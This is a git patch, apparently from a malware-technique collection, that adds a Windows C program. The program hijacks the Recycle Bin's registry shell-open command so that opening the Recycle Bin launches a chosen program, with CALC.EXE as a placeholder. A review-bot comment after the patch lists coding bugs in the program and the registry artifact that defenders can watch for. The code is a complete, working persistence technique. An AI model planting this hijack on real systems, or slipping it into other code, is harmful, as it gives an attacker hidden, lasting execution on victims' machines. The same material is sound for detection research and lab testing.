From 4a28961a43393eaf81c9814e39f0201b1632e83a Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Thu, 18 Nov 2021 08:07:55 -0600
Subject: [PATCH] Add files via upload
---
.../Persistence_via_Recycle_Bin.c | 73 +++++++++++++++++++
1 file changed, 73 insertions(+)
create mode 100644 The Persistence Series/Persistence via Recycle Bin/Persistence_via_Recycle_Bin.c
diff --git a/The Persistence Series/Persistence via Recycle Bin/Persistence_via_Recycle_Bin.c b/The Persistence Series/Persistence via Recycle Bin/Persistence_via_Recycle_Bin.c
new file mode 100644
index 0000000..ee77a7f
--- /dev/null
+++ b/The Persistence Series/Persistence via Recycle Bin/Persistence_via_Recycle_Bin.c
@@ -0,0 +1,73 @@
+#include
+#include
+
+#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))
+
+DWORD P0x4(VOID);
+
+int main(VOID)
+{
+ DWORD dwReturn = ERROR_SUCCESS;
+ dwReturn = P0x4();
+
+ if (dwReturn != ERROR_SUCCESS)
+ {
+ return dwReturn;
+ }
+
+ return ERROR_SUCCESS;
+}
+
+DWORD P0x4(VOID)
+{
+ HKEY hKey = HKEY_CLASSES_ROOT;
+ WCHAR lpSubKey[WCHAR_MAXPATH] = L"CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command";
+ WCHAR lpData[WCHAR_MAXPATH] = L"CALC.EXE";
+ HKEY phkResult = NULL;
+ HKEY hkResult;
+ DWORD dispositions;
+
+ if (RegCreateKeyEx(hKey, lpSubKey, 0, NULL,
+ REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkResult, &dispositions) != ERROR_SUCCESS)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult) != ERROR_SUCCESS)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ if (RegSetValueEx(phkResult, NULL, 0, REG_SZ, (PBYTE)lpData, sizeof(lpData)) != ERROR_SUCCESS)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ if (phkResult)
+ {
+ RegCloseKey(phkResult);
+ }
+
+ if (hkResult)
+ {
+ RegCloseKey(hkResult);
+ }
+
+ return ERROR_SUCCESS;
+
+EXIT_ROUTINE:
+
+ DWORD dwError = GetLastError();
+
+ if (phkResult)
+ {
+ RegCloseKey(phkResult);
+ }
+
+ if (hkResult)
+ {
+ RegCloseKey(hkResult);
+ }
+
+ return dwError;
+}
\ No newline at end of file
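Review bot: The `EXIT_ROUTINE` path in `P0x4` cannot be trusted to report or clean up a failure: `hkResult` has no initializer, so when `RegCreateKeyEx` fails the cleanup tests and may close an indeterminate handle, and `GetLastError()` is read even though the registry functions return their status directly, so a failed write can come back as 0. Initialising with `HKEY hkResult = NULL;` and returning the saved return value of the failing call fixes both, which matters to anyone running this in a lab to confirm that a detection fires, since the exit code is the only signal that the write happened. `WCHAR_MAXPATH` is a byte count used as an element count, so both arrays are oversized and `sizeof(lpData)` stores the whole padded buffer rather than just the string. The file also has no header comment; one such as `/* Sets the default value of HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command; delete the key after testing. */` would name the registry artifact to monitor and to remove.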